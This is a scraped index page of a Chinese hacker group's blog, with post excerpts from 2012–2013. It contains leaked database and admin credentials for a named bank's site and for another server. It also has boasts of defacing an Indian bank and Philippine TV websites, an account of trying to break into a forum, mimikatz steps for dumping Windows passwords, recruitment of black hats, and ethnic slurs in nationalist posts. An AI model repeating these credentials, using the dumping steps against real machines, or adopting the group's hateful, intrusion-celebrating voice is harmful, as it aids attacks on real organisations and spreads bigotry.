显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

7z1@EvilShad0w

Evilshad0w new home: www.1990day.com

 
 
 
 
 
 

阿尔及利亚 农业银行( Agricultural Bank of Algeria )

2013-3-17 14:01:30 阅读797 评论0 172013/03 Mar17

目标  http://www.badr-bank.dz

网站路径 : /home/badrbank/public_html/

Host IP:67.19.120.37

Web Server: Apache

DB Server: MySQL >=5

Resp. Time(avg):654 ms

Current User: badrbank_bank@localhost

Sql Version: 5.5.23-55

Current DB: badrbank_badr

System User: badrbank_bank@localhost

数据库名:badrbank_badr

管理员表名:fr_admin_user

管理员账号:

user: admin     passwd: badr

user: eeee     passwd: eeee

2011.2.6 文档记录:

Server: db.eldjazair.dz

Username : museeantiquites

Password :  PU87re/*az

数据名: museeantiquites-ar

作者  | 2013-3-17 14:01:30 | 阅读(797) |评论(0) | 阅读全文>>

对国外黑客论坛 hackerstown.com 的一次测试

2013-1-8 1:31:26 阅读1417 评论3 82013/01 Jan8

最近太忙了,一直没更新博客!先谈谈气候吧,尼玛南方冷死了!我现在是出门穿再多都哆嗦啊!

日,你什么时候来啊,我还是喜欢大热天吹电风扇,擦~ 大热天还可以裸睡,多爽!

好吧,不扯谈了,对于为什么突然日这个站,其实还是前几天在看我网易博客的时候突然又看到之前一老外在我网易博客"About EvilShad0w Team" 这篇日志下留言并留了个地址,如图:

前几天就看到这条评论,就点开了网址看见是个黑客论坛,版块内容还比较丰富,其中很多文章都还不错,突然试试入侵,于是先看他是什么程序吧。 通过分析论坛结构,确定为“MyBB”,于是通过之前收藏的一个国外exploit 公布站搜索了下这个程序,结果出来了很多 ,有 SQL注入、信息泄露、XSS、远程代码执行。但一一试过,都无效。貌似已经打全补丁了。好吧,该我自己整合的字典上阵了!扫描完后发现路径都是一般常见的路径,我一一点击尝试访问都出现403 Forbidden,在访问其中 xxxx/的时候发现根路径泄露

还有目录遍历,然后再点击三级目录发现上传页面,只能浏览当前目录,并且禁止了上传,只能重命名文件还有写txt文件, 尼玛! 我通过一个小页面写入txt文件,但是无法重命名,这时候我发给Liuker一起看,我俩啥后缀都试过了就是不能解析,一定是做限制了,在写文件的时候尝试跳目录也没成功,突

作者  | 2013-1-8 1:31:26 | 阅读(1417) |评论(3) | 阅读全文>>

嘿,我们搬家了!

2012-9-28 1:46:11 阅读640 评论3 282012/09 Sept28

伙计们,好久不见!

因本人随时都关注军事新闻、国际新闻,发现近日里中国南部周边领土争端问题可是沸沸扬扬的一片,局势很紧张!本想再次去打那些无耻国家政府站的主意,可惜的是由于事情太多没有时间去对那些感兴趣站进行任何动作。不过在之前也有一些信息被我们所掌握。

这次上来其实就想说一声,邪影有了新的博客站点,网址是:www.1990day.com 。此网易博客以后留做备用。

邪影目前成员之中人数不多,并且各有生活中的琐事所牵绊,所以没有很充分的时间在网络上活动。邪影一直在等待更多的兄弟加入。希望那些有一定渗透经验,富有国外Hacker 精神思想的黑帽子会对我们的组织核心精神感兴趣 。谢谢关注我们的人!

作者  | 2012-9-28 1:46:11 | 阅读(640) |评论(3) | 阅读全文>>

Fuck Japan

2012-8-17 11:51:10 阅读589 评论2 172012/08 Aug17

弄死小日本!那个天朝一人发一把AK47吧,巴雷特也行~    期待邪影出现在日本狗的网站首页吧~  拭目以待~

作者  | 2012-8-17 11:51:10 | 阅读(589) |评论(2) | 阅读全文>>

SQLMAP Win 下Python环境运行不正常解决

2012-7-22 14:53:11 阅读964 评论1 222012/07 July22

通过官网的包下载过来运行测试注入只弹出了cmd 运行框。

找到sqm.pyw 用记事本打开找到 “cmd = "start....... ” 把这一行参数替换成以下的 参数就可以正常运行了,不过python的环境装在什么位置就改什么路径。

cmd = "start C:\Windows\System32\cmd.exe /k C:/Python27/python.exe

sqlmap.py %s"

作者  | 2012-7-22 14:53:11 | 阅读(964) |评论(1) | 阅读全文>>

菲律宾电视台网站被黑

2012-5-16 15:00:47 阅读887 评论0 162012/05 May16

 好像是上上个月与Ancker 拿下的。今天想到突然就去玩了一下~~

主要是Ancker 太有才了。哈哈~~   阿基诺,你妈叫你回家吃奶了!

Web site : http://www.jacktv.com.ph/     http://www.btv.com.ph

Philippine TV station is attacked

作者  | 2012-5-16 15:00:47 | 阅读(887) |评论(0) | 阅读全文>>

MS12-032的POC

2012-5-14 15:21:42 阅读351 评论0 142012/05 May14

fuck ! 网易还限制字数。超链接: http://www.nigesb.com/ms12-032-poc.html

作者  | 2012-5-14 15:21:42 | 阅读(351) |评论(0) | 阅读全文>>

PadBuster V0.3 And The .NET Padding Oracle Attack

2012-4-13 16:30:39 阅读2 评论0 132012/04 Apr13

Now that a weekend has passed since the .NET patch was released, and since there is already a working public example of how to reliably download a web.config using the padding oracle attack, we have decided to finally release v0.3 of PadBuster with the "Brute Force" option. This option is specifically designed to handle scenarios where the first block of ciphertext cannot be crafted using CBC-R due to a secret IV. This feature was NOT designed specifically for the .NET attack, as our intention

作者  | 2012-4-13 16:30:39 | 阅读(2) |评论(0) | 阅读全文>>

Html5 10大威胁:隐形攻击与潜伏的漏洞

2012-4-11 11:33:25 阅读477 评论0 112012/04 Apr11

HTML5是一个新兴的下一代应用程序堆栈。 HTML5 增强浏览器功能,并能够在现代的浏览器架构的情况下执行的富互联网应用程序。有趣的是,HTML5可以在移动设备上运行,所以使它更加复杂。 HTML5是不是一个单一的技术堆栈,但像的Document Object model (DOM), Cross Origin Resource Sharing (CORS) 和增强 HTML/Browser 渲染 的各个组成部分的组合。它带来了一些新技术的浏览器没有见过像localstorage,webSQL,WebSocket,webworkers,enhanced XHR,仅举例基于DOM的XPATH之间 。 它加强了攻击面和剥削的攻击和恶意代理点 。通过利用这些载体可以手工隐形攻击和潜伏的漏洞,它是防不胜防,容易妥协。在本文中,我们将通过这些新的架构,面临可能的攻击与威胁。。这里是我们要与实际的示例和演示详细介绍其中的前 10 位威胁。

ClickJacking & Phishing by mixing layers and iframeCSRF and leveraging CORS to bypass SOPAttacking WebSQL and client side SQL injectionStealing information from Storage and Global variablesHTML 5 tag abuse and XSSHTML 5/DOM based XSS and redirectsDOM injections

作者  | 2012-4-11 11:33:25 | 阅读(477) |评论(0) | 阅读全文>>

计算机战争背后的“死亡商人”

2012-3-26 17:30:24 阅读393 评论2 262012/03 Mar26

上个月,谷歌(微博)在温哥华举办了一个比赛,会上这家搜索巨头以安全著称的Chrome浏览器被黑客们两度攻陷。这两种新的黑客攻击方法都利用了一个作弊网站来绕过Chrome的安全保护,结果成功侵入了目标电脑。虽然这两次黑客攻击都攻破了谷歌的防护措施,但这只是第三次真正成功地入侵谷歌系统。

来自法国安全公司Vupen的黑客团队采取了不同的做法。他们没有参加谷歌的比赛,而是通过破解Chrome的安全保护以赢得惠普(微博)在同一场大会上赞助的另一场黑客比赛。虽然谷歌向那两位赢得其比赛的黑客各提供了6万美元奖金,条件是他们要告诉谷歌他们的攻击细节,并帮助谷歌修复他们利用的漏洞。Vupen的CEO兼首席黑客查欧基·贝克拉(Chaouki Bekrar)表示,他的公司根本不想将其秘密技术告诉谷歌——当然不会为了6万美元而进行这种愚蠢的交换。

“我们不会把这种技术告诉谷歌,即使给我们100万美元也不行。”贝克拉说,“我们不想告诉谷歌任何可以帮助他们修复这个漏洞或其他类似漏洞的知识。这是为我们的客户保留的。”

毕竟,这些客户的目的不是修复谷歌或其他任何商业软件供应商的安全漏洞。他们是政府机构,购买了“零天攻击”(指在软件安全漏洞被发现的头一天便遭到攻击——译注)技术或那些利用了软件中未公开漏洞的黑客技术。他们的目的显而易见,就是侵入或干扰犯罪嫌疑人和情报目标的电脑和电话。

在阴暗但合法的安全漏洞市场上,“零天攻击”技术可能会使黑客从软件公司手中得到2,000或3,000美元,但打算秘密使用这个漏洞的间谍和警察可能会给出10倍甚至100倍的价钱

作者  | 2012-3-26 17:30:24 | 阅读(393) |评论(2) | 阅读全文>>

Hacked India Bank

2012-3-25 20:29:16 阅读1077 评论1 252012/03 Mar25

印度阿三最近在中国藏南动作频频,以为中国一心想搞发展不敢开战。

我国一直实行大国风范不和无赖较量,可最近阿三实在是有点疯狂极了。

以下两个连接说明了阿三的企图:

http://v.ifeng.com/mil/mil/zhenfeng/

http://v.ifeng.com/mil/mil/yinduzaoshi/index.shtml

印度第三大银行被 EvilShadow 和谐   www.corpbank.com   www.csb.co.in

快照: http://zonehmirrors.net/defaced/2012/03/25/corpbank.com/

新闻关键字:Indian Corporation Bank defaced by Chinese hackers

作者  | 2012-3-25 20:29:16 | 阅读(1077) |评论(1) | 阅读全文>>

iPhone 渗透装备Top

2012-3-14 8:50:21 阅读1056 评论0 142012/03 Mar14

很多渗透工具已经被移植到iPhone上,在我了解看来,大多有好几款安全工具都还是商业的,需要付费。这里收集了一些IOS 应用渗透测试工具,可以在国外网站下载。

1. Metasploit

2. SET (Social Engineering Tool)

3. Nikto2 (depends on Perl(which takes a lot of space on root partition))

4. Stealth Mac

5. Inguma

6. Slow loris

7. Pentbox 1.4

8. Netcat

9. iPwn

10. Ettercap-ng

11. dsniff

12. danaus plexippus

13. iAHT

14. Nmap

PS. 首先iPhone已经越狱,才可以安装这些工具。

Cydia 源

http://cydia.myrepospace.com/chattaboxa

http://cydia.myrepospace.com/boo

http://cydia.theworm.tw/

作者  | 2012-3-14 8:50:21 | 阅读(1056) |评论(0) | 阅读全文>>

山寨版“匿名者群” Helen式的人格完美体现

2012-3-9 23:37:03 阅读1839 评论5 92012/03 Mar9

首先随便说一点吧,今天为什么要发这个,我觉得很有必要跟之前“雾隐暗杀” 以及事变之后来的“银河舰队”的兄弟参考参考这个附件中的聊天记录。Helen式的人格将在群聊天记录中完美体现,对于过去与现在的种种看他是怎么说的。多余的不想说了,当然我是很艰难的看完这份聊天记录,是一个在那个群看不下去的老弟提供的。

还有,大家别认为这是炒作贴,我个人认为这是他的终结贴,这一份聊天记录就够了,因为这个人已经没有再被圈里人谴责的资格了 !

部分截图:

想看更雷人的请点击右边的超链接,最关键可以从3月7号开始看。  聊天记录下载

作者  | 2012-3-9 23:37:03 | 阅读(1839) |评论(5) | 阅读全文>>

牛X神器-mimikatz

2012-2-24 11:16:24 阅读1167 评论0 242012/02 Feb24

发现一款法国佬写的神奇, 这个神器不但可提取主机的 lm hash 和 ntlm hash , 还可直接获取windows操作系统的明文口令 , 强悍! 

来个插图:

使用方法:

1. 运行主程序:mimikatz.exe

2. 输入:privilege::debug      提升权限

3. 输入:inject::process lsass.exe sekurlsa.dll

将sekurlsa.dll  注入到lsass.exe 中

4. 输入:@getLogonPasswords

即可获取hash和当前用户的明文密码!

下载地址:http://blog.gentilkiwi.com/mimikatz

作者  | 2012-2-24 11:16:24 | 阅读(1167) |评论(0) | 阅读全文>>

查看所有日志>>

 
 
 
 
 
 
 
 

贵州省 贵阳市

 发消息  写留言

 
Just a Patriot ... 只是一名满腔热血爱国者...
 
博客等级加载中...
今日访问加载中...
总访问量加载中...
最后登录加载中...
 
 
 
 
 
 
 
心情随笔列表加载中...
 
 
 
 
 

天气

 
 
模块内容加载中...
 
 
 
 
 

网易新闻资讯

 
 
 
 
新闻标题 
列表加载中...
 
 
 
 
 
 
 
模块内容加载中...
 
 
 
 
 
 我要留言
 
 
 
留言列表加载中...
 
 
 
 
 
 
 
 
 
 
 
网易云音乐 曲目表歌词秀
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
列表加载中...
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2014

创建博客 登录  
 加关注